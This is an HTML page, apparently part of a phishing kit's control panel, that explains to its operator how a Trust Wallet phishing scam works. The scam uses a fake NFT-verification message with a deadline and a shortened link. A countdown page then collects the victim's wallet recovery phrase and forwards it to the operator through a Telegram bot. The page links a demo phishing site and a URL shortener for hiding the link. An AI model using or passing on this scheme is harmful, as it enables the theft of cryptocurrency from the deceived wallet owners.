<div class="main-panel">
  <div class="content-wrapper">
    <h3 class="text-white">Trust Wallet Phishing</h3>
    <br />
    <h4>How does this work?</h4>
    <br />
    <p>
      1. The attacker sends a message/email which informs the user that their
      wallet must be verified due to an NFT update. Failing to verify the
      wallets will result in account suspension.
      <br />

      The message tells them to verify their account before a near deadline by
      clicking on the phishing link
    </p>
    <br />
    <p>2. The phishing URL is shortened by a url shortener to hide the link.</p>
    <br />
    <p>
      4. The phishing page displays a 15-second countdown to “open their secure
      internet environment.” This message is intended to raise the user’s
      confidence in the security of the website. After the countdown ends, the
      malicious page is triggered.
    </p>
    <br />
    <p>
      5. The user is asked to enter their recovery phrase to unlock their
      wallet. Most cryptocurrency wallets use 12-word recovery phrases, but in
      some cases, they may use 24.
      <br />
    </p>
    <br />
    <p>6. You receive the phrases via a telegram bot</p>
    <br />
    <br />

    <h4>Example Site</h4>
    <br />
    <p>
      Here is a demo:
      <a target="_blank" href="https://walletph.vercel.app/"
        >Trust Wallet Phisphing example</a
      >
    </p>
    <br />
    <p>
      To shorten URL try:
      <a href="https://www.shorturl.at/"> URL shortener</a>
    </p>

    <br />
    <br />
  </div>
</div>

<script
  src="https://code.jquery.com/jquery-3.7.1.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous"
></script>
